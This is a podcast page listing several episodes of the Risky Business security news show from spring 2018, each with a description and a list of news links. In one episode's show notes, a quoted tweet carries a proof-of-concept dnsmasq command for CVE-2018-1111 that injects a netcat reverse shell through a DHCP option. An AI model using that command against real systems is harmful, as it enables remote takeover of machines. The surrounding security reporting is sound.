Risky Business #501 -- Trisis: signalling, deterrence or escalation?

May 30, 2018


On this week’s show we’ll be talking about a whole bunch of stuff – the FBI taking down a botnet in a very FBI way, we go deep on the Trisis malware popping up in the US following America’s withdrawal from the so-called Iran agreement. We look at the latest in the crypto debate, breaches, bugs and more!

We’ll hear from Tom Uren of Australia’s Strategic Policy Institute (ASPI) on the Trisis side of things. Tom worked in an interesting place in Australia’s defence department but these days spends his days think tanking for the Australian Strategic Policy Institute. He shares his thoughts on what it is Iran could be up to with Trisis.

This week’s show is brought to you by: Australia!

AustCYBER is a government-supported industry group here that is trying to get the Australian cybersecurity industry organised. There’s the VC-backed US model, the build a “cyber city” in the desert Israeli model, then there’s the Australia model, which is actually quite different. It’s much more about helping local startups win deals locally, then internationally, to get them on a path to profitability so they don’t have to sign the awful term sheets Australian VCs put in front of them.

Well, there’s more to it than that, but AustCYBER head honcho Michelle Price will be along in this week’s sponsor interview to walk us through what she’s trying to do for the Australian security industry and how foreign multinational companies can also benefit from that.

Show notes Exclusive: FBI Seizes Control of Russian Botnet Cisco's Talos Intelligence Group Blog: New VPNFilter malware targets at least 500K networking devices worldwide Robᵉʳᵗ Graham 🤔 on Twitter: "This advice from the FBI is best described as "moronic". It advised 126 million households in the U.S. to reboot their routers in order to address a botnet of 500,000 devices located mostly outside the U.S." FBI: Kindly Reboot Your Router Now, Please — Krebs on Security FBI shuts down domain behind Russian 'VPNFilter' botnet Researchers uncover sophisticated botnet aimed at possible attack inside Ukraine Trisis masterminds have expanded operations to target U.S. industrial firms U.S. industry experts call for vigilance after Trisis group goes global In the dark about 'going dark' Encryption advocates rip FBI over inflated encrypted device statistics Apple reports spike in national security requests amid promises of more transparency Why Is Your Location Data No Longer Private? — Krebs on Security The U.S. military combined cyber and kinetic operations to hunt down ISIS, general says Hacker linked to Russian intelligence sentenced to five years in prison Cyber crooks claim to hit two big Canadian banks | Reuters Chinese researchers warn blockchain company EOS about 'epic' vulnerability in soon-to-launch platform No one is updating their Android devices, new data shows Oracle Plans to Drop Java Serialization Support, the Source of Most Security Bugs 3 Charged In Fatal Kansas ‘Swatting’ Attack — Krebs on Security Russian unit, GRU officer linked to 2014 shoot-down of airliner over Ukraine | Ars Technica Cyber Security Growth Network - Australian Cyber Security Growth Network

Risky Biz Soap Box: Kill your own meat with EclecticIQ

May 28, 2018


Soap Box is not our regular weekly show, it’s the monthly podcast here at Risky Biz HQ where vendors pay to come on to the show to talk about what it is they actually do.

Before EclecticIQ sponsored this edition, to be honest, I didn’t really know much about them. All I knew is that their positioning was very much around “threat intelligence,” which, as regular listeners would know, are two words that are usually followed by “derpa derpa” on the regular Risky Business podcast.

BUT! Here’s the thing. EclecticIQ don’t sell a “blinky light” box that receives a creaky feed of 12-month-old IOCs. They sell their solution to either massive organisations or very high risk organisations. They could be national cyber security centres, entire defence departments, very, very big enterprises; basically anyone that has an intelligence team and multiple constituent departments or agencies. They also play in ultra high risk sectors like defence contracting.

The EclecticIQ platform isn’t for small organisations. It really is for orgs that have dedicated, externally-focussed intelligence teams. Their play isn’t “we feed you threat intelligence,” it’s use our tooling to go get your own threat intelligence, develop a strategy for dealing with the resulting product then distributing the strategy that flows from that process out to the relevant people in your organisation. I like to think of this approach as “killing your own meat”. That’s what EclecticIQ is all about. They give you the shotgun and a map, the last known locations of the deer, a cool room and a bunch of cleavers. Delicious. Apologies to any vegetarians listening for that metaphor.

Joep Gommers is our guest. He is the founder and CEO of EclecticIQ. Prior to founding EclecticIQ, Joep served as Head of Global Collection and Global Intelligence Operations at iSIGHT Partners, which was, of course, acquired by FireEye. Joep joined me to talk about what it is that EclecticIQ actually does and the resulting conversation, I hope, will be interesting to anyone who wants to understand how Threat intelligence is developed and disseminated at scale.

There’s a link to EclecticIQ’s website below, and you can follow Joep Gommers on Twitter here.

Show notes Cyber Threat Intelligence analysis | EclecticIQ

Risky Business #500 -- Web asset discovery is getting useful

May 23, 2018


In this week’s feature interview we’ll be chatting with Shubham Shah and his friend Lord Tuskington about continuous asset discovery’s impact on testing methodologies. Shubs has worked as both a pentester and as a very successful bug bounty hunter. In fact he’s built an entire asset discovery platform that he and his buddies have been using to rip crazy amounts of cash out of bounty programs over the last few years and he’s turning that platform into a product. So I wanted to talk to him about that, but I also wanted to get a pentester’s perspective on how this type of continuous asset discovery tech could change the testing industry.

This week’s show is brought to you by Exabeam, a next generation SIEM company! And it’s amazing how nicely this week’s feature and sponsor interviews dovetail actually, because Exabeam’s Steve Gailey will be along in this week’s sponsor interview to have a chat about how SIEM technology has changed much faster than SOC operations methodologies. Because basically everyone has structured their operations around three levels of response and the workflows are so ingrained, nobody seems to know know what to do with a next generation SIEM.

Adam Boileau is also along, like always, to talk about the week’s security news.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Alleged CIA Leaker Joshua Schulte Has Some of the Worst Opsec I’ve Ever Seen - Motherboard Accused CIA leaker Joshua Schulte accused of more leaks Alleged CIA Leaker Tweeted That Chelsea Manning ‘Should Be Executed’ - Motherboard Trump feels presidential smartphone security is “too inconvenient” | Ars Technica Trump, Chinese leaders moving forward on deal to save ZTE - The Washington Post House measure asks DHS to share info on potential ZTE cyberthreat Potential Trump deal to ease sanctions on China's ZTE riles Congress Revealed: Pentagon Push to Hack Nuke Missiles Before They Launch Banks Adopt Military-Style Tactics to Fight Cybercrime - The New York Times Inside 'Project Indigo,' the quiet info-sharing program between banks and U.S. Cyber Command Hacker Breaches Securus, the Company That Helps Cops Track Phones Across the US - Motherboard LocationSmart bug allowed for leak of location data for nearly any U.S. phone - CyberScoop Who's Afraid of Kaspersky? - Motherboard New speculative-execution vulnerability strikes AMD, ARM, and Intel | Ars Technica After Arrest in Serbia, Netflix Hackers ‘The Dark Overlord’ Say They’re Still Going - Motherboard Cisco's Talos Intelligence Group Blog: TeleGrab - Grizzly Attacks on Secure Messaging North Korea-tied hackers used Google Play and Facebook to infect defectors | Ars Technica The Wayback Machine is Deleting Evidence of Malware Sold to Stalkers - Motherboard Latvian national convicted of running 'VirusTotal-for-criminals' malware scanner Alphabet's Jigsaw offers political campaigns free DDoS protection T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account — Krebs on Security Karin Kosina on Twitter: "So the guy behind the Carbanak malware that stole hundreds of millions of dollars? He was caught because he bought a car for 70k and didn't pay the bill. Can't make this sh** up :) #opsec #fail" GPON Routers Attacked With New Zero-Day Cisco fixes critical ‘DNA’ software flaws Pakistan: Campaign of hacking, spyware and surveillance targets human rights defenders | Amnesty International AUSTRALIA'S DEADLIEST ANIMALS - SONG - YouTube

Risky Business feature interview: Hacking PUBG

May 18, 2018


Here it is – this week’s feature interview with Marisa Emerson! Marisa is a security researcher who did a great talk at BSides Canberra in March all about game cheating.

She was specifically talking about the cheating techniques PUBG gamers are using and just how advanced they are. The crazy thing is the cheaters here are rolling some pretty decent techniques. It’s reminiscent of the iPhone jailbreaking scene – a lot of good hackers who don’t know they’re good hackers.

Marisa is running a binary exploitation bootcamp in Brisbane that will have another session next semester. Details are here.

Show notes Marisa's binarry bootcamp in Brisbane

Risky Business #499 -- Is PGP actually busted and Signal pwnt? Noooope

May 16, 2018


In this week’s weekly show we’re just going to drill in to the week’s extra long security news section with Adam Boileau then go straight to the sponsor interview. I’ve got a fantastic feature interview for you this week, but I’m going to publish it outside of the news show. It was either that or run stupidly long or cut too much from everything to make it all fit.

This week’s sponsor interview is a good one though. We’re chatting with the team behind DarkTrace. They make a machine learning-backed network monitor. A key different with this kit is it actually gets involved on the network. If it sees something it’s confident is attacker behaviour it will start spraying TCP resets to boot them off the network.

This is something the IPS systems of old used to do but it’s an approach that fell out of favour. We’ll find out why that approach was discarded and why it’s coming back, as well as generally discuss the role of machine learning in security with a company that has invested in it heavily. This isn’t a “for or against” interview segment. This is a discussion with one company that is getting value out of the approach, so stick around for that.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times How Two Persian Gulf Nations Turned The US Media Into Their Battleground National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures Bolton eliminates White House Cybersecurity Coordinator position Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it Ex-CIA employee identified as suspect in 'Vault 7' leaks Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4" 'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica CVE-2018-1000136 - Electron nodeIntegration Bypass Security flaw in Electron impacts hundreds of desktop apps Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.…" Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor" Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software." It only took five hours to close a critical vulnerability in Signal's desktop client 'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard China's ZTE says main operations have ceased after US ban Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans" Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!" Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes Dutch ditch Kaspersky on fears of Russian government influence Possible Kaspersky sanctions meet resistance inside U.S. government Wyden calls for FCC investigation into cell-phone tracking used by law enforcement Kia‏☆ on Twitter: "this isnt a joke, try out, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that!" Government would be barred from mandating crypto backdoors under House bill Symantec's stock plummets after announcement of internal audit Lawmakers call for action following revelations that APT28 posed as ISIS online Counterrorism Officials Concerned About Technological Advances of Jihadists in the US Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers Windows 10 OpenSSH Client Installed by Default in April 2018 Update Malicious Apps Get Back on the Play Store Just by Changing Their Name Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=,,1h --conf-file=/dev/null --dhcp-option=6, --dhcp-option=3, --dhcp-option="252,x'&nc -e /bin/bash 1337 #" cc: @cnbrkbolat…" Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian Evil Mainframe Penetration Testing Classes Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite Darktrace

Risky Business #498 -- There sure is a lot of Microsoft Defender out there these days

May 9, 2018


On this week’s show we’re taking a look at some recent data out of Microsoft trumpeting its Defender antivirus install figures on Windows. They’ve got 18% market share on windows 7/9 and 50% on Win10.

For the AV and endpoint security industry Microsoft has always been the existential threat, but has the plane flown into the mountain already? We’ll speak with Securosis analyst and DisruptOps founder Rich Mogull about that in this week’s feature interview.

In this week’s sponsor interview we’re joined by the always entertaining Haroon Meer of Thinkst Canary. When we spoke Haroon had just wrapped up his first ever booth at the RSA conference. He’ll join us this week to tell us, surprisingly, that it was a really worthwhile exercise for Thinkst, but as you’ll hear he also thinks the broader industry can be a pack of dumbasses when it comes to actually marketing tech at events like RSA. If he becomes global ruler RSA booths will be gimmick-free and just show people product demos.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes BREAKING: Documents show how provincial employees misled Halifax police in the FOIPOP security failure FTC urges Twitter users to change passwords | TheHill Iran nuclear deal: Trump pulls US out in break with Europe allies - BBC News Patrick Gray on Twitter: "There are teams workshopping ideas like this in Tehran right now, guaranteed. Personally I'm more worried about Iranian ICS hax. They've gotten good at that stuff.…" Caroline O. on Twitter: "NEW: The Senate Intelligence Committee released its prelim findings into Russian targeting of election infrastructure during the 2016 election. "In a small # of states, Russian-affiliated cyber actors were in a position to, at a minimum, alter or delete voter registration data."…" Facebook security analyst is fired for using private data to stalk women | Ars Technica Sources: Facebook Has Fired Multiple Employees for Snooping on Users - Motherboard Drive-by Rowhammer attack uses GPU to compromise an Android phone | Ars Technica Android App With 10 Million Downloads Left Users’ Photos and Audio Messages Exposed to Public - Motherboard Hundreds of big-name sites hacked, converted into drive-by currency miners | Ars Technica Report: Chinese government is behind a decade of hacks on software companies | Ars Technica Over 10,000 companies downloading software vulnerable to Equifax hack European Central Bank proposes framework to strengthen financial system’s defenses Hysteria over Jade Helm exercise in Texas was fueled by Russians, former CIA director says | The Texas Tribune Defector: WikiLeaks ‘Will Lie to Your Face’ SiliVaccine: Inside North Korea’s Anti-Virus - Check Point Research You Can Finally Encrypt Slack Messages So Your Boss Can't Read Them - Motherboard Microsoft May 2018 Patch Tuesday Fixes 67 Security Issues, Including IE Zero-Day Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack He Fled a Prison in Iceland. Now It’s Good to Be Back. - The New York Times Report: Software bug led to death in Uber’s self-driving crash | Ars Technica Carbon Black stocks close 26 percent up on first day of public trading Why Windows Defender Antivirus is the most deployed in the enterprise – Microsoft Secure thinkst Thoughts...: Considering an RSAC Expo booth? Our Experience, in 5,000 words or less

Risky Biz Soap Box: Root9b on agentless threat hunting

May 4, 2018


In this edition of Soap Box we’re chatting with Root9b. They’ve just launched an updated version of their ORION platform. And I guess the way you’d describe Root9b is as a threat hunt product maker and managed threat hunt provider. And their approach is a bit different – their software is agentless. They basically authenticate to a machine, inject various payloads into memory, and use that to pull back all sorts of telemetry from machines.

They say this means it’s much less likely that attackers will see them and they offer this as a product, ORION, or they offer it as a service. They say their managed services customers come to them because pretty unhappy with their MDR and MSSP providers and want better signalling.

So I was joined by John Harbaugh, COO of Root9b, and Mike Morris, CTO. Both of these guys were US Air Force cyberdudes before jumping out to the private sector. The company actually started off doing training before developing their platform ORION.

John and Mike joined me by Skype for this podcast. Enjoy!

Show notes Hottest cybersecurity products at RSA 2018 | CSO Online Our Cyber Security Software | root9B General Michael Hayden Joins root9B Advisory Board | root9B root9b_follow_up_report_apt28.pdf

Risky Business #497 -- Silvio's greatest hits

May 2, 2018


This week’s Risky Business is kind of going back to its roots a bit. As much as we love talking about policy and the intersection of cyber security with global affairs, sometimes it pays to remember that computer security is actually about computers.

With that in mind this week we’ve got two fantastic interviews for you. We’ll be chatting with Dr. Silvio Cesare in this week’s feature interview. Silvio’s dusted off his bug hunting hat and he’s taken to Twitch-streaming his auditing sessions. Dave Aitel described watching Silvio’s Twitch stream as like seeing a Titan ransack a small Greek village. Five months, 100 bugs, 50 of them in kernel stuff.

He’s doing this for a couple of reasons – he wants to show people how it’s done, and he wants people to realise there are still lots of bugs out there to be found. We’ll chat to him about that in this week’s feature.

This week’s sponsor interview is with another old school hacker, Stephen Ridley. Stephen is the founder of Senrio, which is technically an IoT security play, but the thing is the tech he’s developed has turned out to be useful for all sorts of other stuff too.

Senrio is another one of those hacker-led startups in the spirit of Duo Security or Thinkst Canary. Stephen is a really well respected guy and this week he’s joining us to talk about a bunch of stuff. A lot of it is related to the unexpected uses for Senrio’s monitoring platform. He built a classifier for network-connected devices as a part of Senrio’s IoT security platform, and it turns out it’s actually running rings around a bunch of Enterprise Asset Management tools. People are actually using his IoT security monitoring solution to do asset management and figure out install gaps for their EDR solutions.

Totally not what he intended people to use it for, but hey, a win’s a win. So Stephen joins us this week to talk about that, also to talk about recent developments in the IoT space and really a bunch more stuff.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Amazon Web Services starts blocking domain-fronting, following Google’s lead - The Verge Iran blocks Telegram, pushes replacement with “Death to America” emoji | Ars Technica Chinese Authorities Accidentally Admit to Accessing Deleted WeChat Messages As two Koreas shake hands, Hidden Cobra hackers wage espionage campaign | Ars Technica North Korea's Elites Are Ditching Facebook for Chinese Social Networks After data “clash” report, WhatsApp founder says he’s leaving Facebook | Ars Technica Can This System of Unlocking Phones Crack the Crypto War? Ray Ozzie’s plan for unlocking encrypted phones gets a chilly reception | Ars Technica Matthew Green on Twitter: "This article on WhatsApp suggests that WhatsApp might be weakening its encryption, but doesn’t give any details. That’s pretty worrying." Tens of Thousands of Malicious Apps Using Facebook APIs | Threatpost | The first stop for security news Intel Committee blasts FBI for not notifying Russian hacking victims - Cyberscoop Startup Offers $3 Million to Anyone Who Can Hack the iPhone - Motherboard This Russian Company Sells Zero-Day Exploits for Hospital Software - Motherboard Google and Microsoft ask Georgia governor to veto 'hack back' bill Joy Reid Blames Hackers, Just Like Everyone Else | WIRED Security Trade-Offs in the New EU Privacy Law — Krebs on Security A One-Minute Attack Let Hackers Spoof Hotel Master Keys | WIRED Volkswagen and Audi Cars Vulnerable to Remote Hacking Charlie Miller on Twitter: "Cool new research out on car hacking: Hang on or mute as I'll give my thoughts on it." Lojack Becomes a Double-Agent Europol shuts down one of the largest DDoS marketplaces in the world - CyberScoop Police Have Seized Revenge Porn Site Anon-IB - Motherboard Chinese Police Arrest 15 People Who Hid Malware Inside PUBG Cheat Apps GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs Starting Today, Google Chrome Will Show Warnings for Non-Logged SSL Certificates Long Prison Sentence for Man Who Hacked Jail Computer System to Bust Out Friend State threat-sharing center warns of multiple PHP vulnerabilities - CyberScoop Escalating Privileges with CylancePROTECT — Atredis Partners Hackers Scan the Web for Vulnerable WebLogic Servers After Oracle Botches Patch silviocesare - Twitch Senrio

Risky Business #496 -- The China supply chain problem

Apr 25, 2018


On this week’s show we hear from Jennifer Bisceglie, the CEO of Interos Solutions, a company that recently prepared a report on supply chain security for the US government’s US-China Economic and Security Review Commission. Risky Business contributor Brian Donohue caught up with Jennifer to talk about the report and really get an idea of what supply chain risks look like from a macro level. The long and the short of it is the supply chain is already very, very opaque, so governments and the private sector will have to work pretty hard to mitigate the risks involved here.

This week’s show is brought to you by Netsparker, the web application security scanning toolmaker. Netsparker was founded nine years ago by this week’s sponsor guest, Ferruh Mavituna. He was a pentester who created Netsparker to help him with his own work. But just recently they raised a bundle of cash: US$40m. We’ll catch up with him and find out if a webapp scanning company with $40m is like the mule with the spinning wheel. It certainly seems like Ferruh has some ambitious plans. We haven’t seen this sort of money being raised by comparable companies so it’s definitely interesting stuff.

In this week’s news we cover off:

Mysterious BGP route hijacking for lame Ether theft (??) Google disabling domain fronting Canadian teen charged with downloading documents from a website City of Atlanta spending $2.6m to recover from its ransomware event RSA’s conference app fail White House chaos over Rob Joyce replacement (MAGA!!! MAGAAAAAA!!!!!) Much more

The show notes/links are below, and you can follow Adam, Brian or Patrick on Twitter if that’s your thing.

Show notes Suspicious event hijacks Amazon traffic for 2 hours, steals cryptocurrency | Ars Technica Google disables domain-fronting, removing ability to bypass state-level firewalls - Neowin Teen charged in Nova Scotia government breach says he had 'no malicious intent' | CBC News Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare | WIRED Seamus Hughes on Twitter: "A beautiful circle: Company gets ransomwared. Hires IT company to fix it. Unlocks system in record time. FBI figures out the IT company just paid the bitcoin ransom.…" Nation-state hackers attempted to use Equifax vulnerability against DoD, NSA official says Richard Bejtlich on Twitter: "A million times, this. The "basic cyber hygiene" thesis drives me crazy. It's the epitome of static, time-ignorant thinking. "Hygiene" may work against mindless one-shot malware, or one-trick pony script kiddies. It has no place in serious conversations about targeted intrusions.…" DNC Lawsuit Against Russia Reveals New Details About 2016 Hack | WIRED (tech)Darko||Dan on Twitter: "Apparently @RSAConference isn't giving out maps to Expo attendees anymore - they require you to install their app which wants access to everything short of installing a rootkit on your phone. Are you kidding me @RSAsecurity?…" RSA conference app leaks user data SEC fines Yahoo remnant Altaba $35 million for failing to disclose breach These Ex-Spies Are Harvesting Facebook Photos For A Massive Facial Recognition Database The Cat-and-Mouse Game Between Apple and the Manufacturer of an iPhone Unlocking Tool - Motherboard Someone Is Trying to Extort iPhone Crackers GrayShift With Leaked Code - Motherboard The NSA now officially has a new chief Trump sends cyberwar strategy to Congress A cybersecurity power struggle is brewing at the National Security Council Microsoft-led industry group pledges to not assist government cyberattacks - Cyberscoop Kaspersky Lab banned from advertising on Twitter U.S. government weighing sanctions against Kaspersky Lab Sentencing delayed for FSB's email-popping hacker pawn Introducing Microsoft Azure Sphere: Secure and power the intelligent edge | Blog | Microsoft Azure “Drupalgeddon2” touches off arms race to mass-exploit powerful Web servers | Ars Technica ‘Orangeworm’ hacking campaign hits X-ray and MRI machines Icelandic bitcoin heist suspect arrested in Amsterdam after leaving prison | Ars Technica A bunch of Red Pills: VMware Escapes | Keen Security Lab Blog Spoofing Cell Networks with a USB to VGA Adapter | Hackaday Google Translate Avast reveals more information detailing how hackers compromised CCleaner | V3 New hacks siphon private cryptocurrency keys from airgapped wallets | Ars Technica [TITLE] - AARP Research Report

Risky Business #495 -- Russian Internet users are having a bad time

Apr 18, 2018


We’re still running in a trimmed down format this week, sorry about that. Regular listeners would know we’ve been dealing with some unexpected stuff over here in the house of Business, but the good news is things have settled down and we’re actually back home after more than three weeks away. Things are looking good for a return to a full format show either next week or the week after.

But don’t worry, there’s plenty of good stuff in this week’s news segment with Mark Piper, including:

Russia blocking 15m cloud service IPs to shut down Telegram RU router hax: Are they a big deal? FBI’s “going dark” narrative questioned Rob Joyce departs White House ZTE in all sorts of trouble AND MOAR

This week’s show is brought to you by Cylance. Jim Walter of Cylance will be along in this week’s sponsor interview to talk about a couple of things – we’ll be looking at “fileless” malware – for what it’s worth it’s a term that we both hate – and we’ll also be talking about how complete amateurs are now able to run reasonably sophisticated malware campaigns these days thanks to the badware for hire business getting even more slick.

The show notes/links are below, and you can follow Pipes or Patrick on Twitter if that’s your thing.

Show notes In effort to shut down Telegram, Russia blocks Amazon, Google network addresses | Ars Technica Anatoly Rosencrantz on Twitter: "over night russian authorities are blocking about 2 000 000 IPs of Amazon and Google. Everyone thought it’s a mistake, until RKN head Zharov confirmed it is not. Tactics: to force Google and Amazon push Telegram out of their clouds by blocking basically whole cloud for Russia…" US, UK Accuse Russia of Hacking Home Routers and ISPs to Conduct MitM Attacks Lawmakers Call FBI's 'Going Dark' Narrative 'Highly Questionable' After Motherboard Shows Cops Can Easily Hack iPhones - Motherboard Congress wants answers on FBI's 'going dark' problem in wake of DOJ IG report Cybersecurity adviser Rob Joyce to leave White House, return to NSA Bolton will lead charge to replace cybersecurity coordinator, DHS secretary says Rob Joyce on Twitter: "EU's GDPR is going to undercut a key tool for identifying malicious domains on the internet. WHOIS database will be noncompliant, or have to purge the data that makes it useful to find bad actors. @briankrebs is spot on. Cyber criminals are celebrating GDPR.…" Update: Zuckerberg Said He ‘Misspoke’ About Alerting Campaigns to Russian Hacking Attempts - Motherboard Deleted Facebook Cybercrime Groups Had 300,000 Members — Krebs on Security Intel to Allow Antivirus Engines to Use Integrated GPUs for Malware Scanning Chinese Mobile Device Maker ZTE Banned From Buying U.S. Goods Hamas-linked spyware targeting Palestinians removed from Google Play store FTC: "Warranty Void If Removed" Stickers Are Illegal Barclays Bank plc - ASA | CAP NIST releases updated cybersecurity framework Researchers Rickrolled Emergency Alert Sirens in Proof-of-Concept Hack - Motherboard Exploitation of Drupalgeddon2 Flaw Starts After Publication of PoC Code Yubico Delivers Passwordless Login for Enterprise Authentication on Windows 10 Devices | Yubico The Teens Who Hacked Microsoft's Xbox Empire—And Went Too Far | WIRED Senior Manager of Research and Development: Careers | Duo Security Welcome to Mars Cylance | Artificial Intelligence Based Advanced Threat Prevention

Risky Business #494 -- Cisco customers have a bad week, plus a deep dive on WebAuthn

Apr 10, 2018


Regular listeners would know Risky Business is just running the news and sponsor segments at the moment so there’s no feature interview in this week’s show. But that’s fine because we’ve got plenty to get through in the news segment with Adam Boileau.

Then we’ve got a killer sponsor interview for you this week with Nick Steele and James Barclay of Duo Security.

They’re here to talk about WebAuthn. It’s the new authentication spec currently going through the W3C process. Both Nick and James will be along later to talk about what the spec is designed to do, how it works and what its chances of becoming mainstream are, and spoiler alert, those chances are pretty good.

They’ve also provided me with some links for people out there who want to play around with Webauthn, they are below.

Links to all the news items are also below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Show notes Nation-state hackers hit Cisco switches - Cyberscoop "Don’t Mess With Our Elections": Vigilante Hackers Strike Russia, Iran - Motherboard With trade war looming, Chinese cyberattacks may follow - CyberScoop Police could access US cloud data under planned crime-fighting deal DHS defends media-monitoring database, calls critics “conspiracy theorists” | Ars Technica Alex Ionescu on Twitter: "I generally wasn't opposed to the idea of Chrome making sure that people's documents/downloads weren't full of latent ransomware. But pegging my CPU as you run... f*cking... ESET... on my entire drive? I'm glad I switched to Edge on my desktop PC, I guess it's time for the laptop" After Crackdown, Neo-Nazis Are Hosting Propaganda on Censor-Proof Networks - Motherboard Chinese Government Forces Residents To Install Surveillance App With Awful Security - Motherboard A Long-Awaited IoT Crisis Is Here, and Many Devices Aren't Ready | WIRED DARPA is looking to avoid another version of Meltdown or Spectre - CyberScoop This Tool Can Help Identify Leakers Who Copy and Paste Secret Info - Motherboard T-Mobile Stores Part of Customers' Passwords In Plaintext, Says It Has 'Amazingly Good' Security - Motherboard Beware of Bing Chrome Download Ads Pushing Adware/PUP Installers Three Execs Get Prison Time for Pirating Oracle Firmware Patches Russia Readies Telegram Ban After App Refused to Hand Over Encryption Keys to FSB VirusTotal Launches Droidy, Its New Android Sandbox Technology Researchers Hijack Over 2,000 Subdomains From Legitimate Sites in CloudFront Experiment Tavis Ormandy on Twitter: "This is amazing, Windows Defender used the open source unrar code, but changed all the signed ints to unsigned for some reason, breaking the code. @halvarflake noticed and got it fixed. Remote SYSTEM memory corruption 😨" Australia's Offensive Cyber Capability | Australian Strategic Policy Institute | ASPI Josh Marshall on Twitter: "oh look "security expert" Rudy Giuliani shows you how to do a special "dark web scan", courtesy of Experian." GitHub - duo-labs/webauthn: A Demonstration of the WebAuthn Specification GitHub - duo-labs/py_webauthn: A WebAuthn Python module. ImperialViolet - Security Keys Web Authentication: An API for accessing Public Key Credentials Level 1 Using Hardware Token-based 2FA with the WebAuthn API – Mozilla Hacks – the Web developer blog Trying Out Web Authentication (WebAuthn) Web Authentication: What It Is and What It Means for Passwords | Duo Security

Risky Business #493 -- SWIFT, pipeline attacks, Chrome's AV feature and more

Apr 4, 2018


This week’s show is just the news segment and sponsor interview. But, as always, there’s plenty to discuss with our news guest Adam Boileau!

In this week’s sponsor interview we’ll be hearing from Timothy Keeler from Remediant.

Remediant is a small but growing company that does privileged account management stuff, but they’re not a password vault. Tim’s joining us this week to walk through some of the challenges of managing privileged access in devops environments and also to talk a bit about some of the challenges around single sign on and privilege management. It’s all good stuff, and it’s coming up after the news.

Links to all the news items are below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Show notes Philippine’s financial institutions cautioned after Malaysia Central Bank counters cyber attack Major U.S. pipeline disrupted by cyberattack on transaction software The Under Armour Hack Was Even Worse Than It Had To Be | WIRED Leaks Millions of Customer Records — Krebs on Security Baltimore’s 911 system, Boeing join Atlanta in week of crypto-malware outbreaks | Ars Technica Authenticity Matters: The IRA Has No Place on Facebook | Facebook Newsroom Chrome Is Scanning Files on Your Computer, and People Are Freaking Out - Motherboard The Pentagon's latest bug bounty target is its travel booking system Georgia Senate Passes Bill That Criminalizes Unauthorized Pen-Tests Alleged NSA leaker seeks to subpoena major cybersecurity companies, intel agencies John Bolton, cyber warrior - POLITICO Two founders of cryptocurrency offering arrested, charged with fraud | Ars Technica MITRE Offers ATT&CK-Based Evaluations of Post-Exploit Detection Products | The MITRE Corporation Extradited Russian pleads not guilty to massive LinkedIn breach Lizard Squad's '@fbiarelosers' hacker gets smaller sentence for helping FBI arrest his friends The fear over WannaCry is still very real Tor Project Discontinues Tor Messenger After Only 2.5 Years macOS High Sierra Logs Encryption Passwords in Plaintext for APFS External Drives Section 301 FINAL.PDF Success Story - Remediant

Risky Biz Soap Box: Network detection is dead! Long live network detection!

Apr 2, 2018


This Soap Box edition is brought to you by ICEBRG.

ICEBRG is in the business of network-based response and detection. In simple terms they drop a box on your network that strips network metadata and shunts it up to their cloud for analysis. This allows incident responders in particular to really, really speed up their investigations. We know that a lot of internet traffic is encrypted these days, and that’s made some people take their eye off the network ball. The focus and buzz these days is very much on endpoint detection and response. Our guest on this edition of Soap Box, ICEBRG’s VP of Strategic Partnerships Jason Rebholz, thinks we’ve wound up with a blind spot as a result.

